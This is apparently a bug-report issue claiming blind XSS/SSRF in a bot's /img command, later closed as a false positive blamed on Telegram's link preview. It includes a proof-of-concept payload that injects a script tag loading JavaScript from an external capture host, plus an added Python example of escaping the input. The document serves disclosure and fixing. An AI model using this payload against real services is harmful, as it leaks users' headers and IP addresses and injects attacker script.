Fix input handling for security purpose. #2
Due to poor input sanitization, the /img call to the bot is vulnerable to Blind XSS/SSRF.
Vulnerable code:
qValue is inserted without sanitization into the HTML content, making it vulnerable to XSS/Blind XSS.
PoC part 1:
/img "><script type="text/javascript" src="https://asdafasdas.free.beeceptor.com/first.js"></script><"
PoC part 2:
Screen 1, request to first.js
Screen 2, Headers leaked and also IP address could be leaked.
PoC part 3 - theoretically:
Since it's possible to abuse the function to inject JavaScript/HTML, an attacker could do SSRF and use the bot as a proxy or even read local files and send content to an external host.
PoC part 4 - IP Leak thanks to SSRF through JavaScript Injection.
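The escaping this report asks for, shown next to the raw insertion it describes. This is an added example, not code from the issue or from the bot: the template, the `images.example` host and all function names are assumptions, and only the PoC message is taken from the report.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Hypothetical template: the leading `">` of the PoC implies qValue lands inside
# a double-quoted attribute. The bot's real template is not shown in the issue.
TEMPLATE = '<html><body><img src="https://images.example/search?q={q}"></body></html>'

# The PoC message from the report, embedded as a string literal.
POC = ('/img "><script type="text/javascript" '
       'src="https://asdafasdas.free.beeceptor.com/first.js"></script><"')


def parse_img_command(message: str) -> str:
    """Return the argument of a '/img <query>' message (the report's qValue)."""
    cmd, _, arg = message.partition(" ")
    if cmd != "/img":
        raise ValueError("not an /img command")
    return arg.strip()


def render_unsafe(q_value: str) -> str:
    # Behaviour the report describes: qValue is placed into the HTML as-is.
    return TEMPLATE.format(q=q_value)


def render_safe(q_value: str) -> str:
    # Encode for each context in turn: first the URL query string,
    # then the HTML attribute that carries the URL.
    return TEMPLATE.format(q=html.escape(quote(q_value, safe=""), quote=True))


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(document: str) -> list:
    """List the start tags an HTML parser sees in the rendered page."""
    collector = _TagCollector()
    collector.feed(document)
    collector.close()
    return collector.tags
```

Comparing `tags_in(render_unsafe(...))` with `tags_in(render_safe(...))` on the PoC argument shows whether a `script` element survives rendering.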
It's the stupid Telegram preview.
Closing as false positive after some discussion with developers.